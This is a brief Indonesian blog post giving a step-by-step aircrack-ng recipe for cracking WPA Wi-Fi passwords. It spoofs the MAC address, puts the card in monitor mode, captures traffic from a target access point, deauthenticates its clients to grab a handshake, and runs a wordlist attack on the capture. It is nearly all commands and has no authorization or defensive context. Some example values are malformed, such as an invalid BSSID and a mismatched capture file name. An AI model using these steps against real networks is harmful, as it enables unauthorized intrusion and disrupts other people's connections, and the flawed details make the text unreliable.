1. Lihat kartu driver
airmon-ng
2. Matikan sementara wireless (driver contoh wlan0 tergantung kartu wireless anda)
airmon-ng stop wlan0
3. Matikan driver untuk sementara
ifconfig wlan0 down
4. Ubah alamat mac (misal menggunakan mac address 00:11:22:33:44:55)
macchanger --mac 00:11:22:33:44:55 wlan0
5. Aktifkan mode monitor
airmon-ng start wlan0
6. Scan wireless yang tersedia
airodump-ng wlan0
7. download paket dengan nama wep123
airodump-ng -c [channel] -w wpa --bssid [alamat BSSID] wlan0
misal:
airodump-ng -c 11 -w wpa --bssid 00:0F:8J:FD:C0 wlan0
8. Lakukan permintaan autentifikasi
aireplay-ng -0 5 -a [alamat BSSiD] wlan0
aireplay-ng -0 5 -a 00:0F:8J:FD:C0 wlan0
aircrack-ng wpa-01.cap
aircrack-ng wpa-01.cap -w /usr/share/doc/aircrack-ng/examples/password.lst
Tidak ada komentar:
Posting Komentar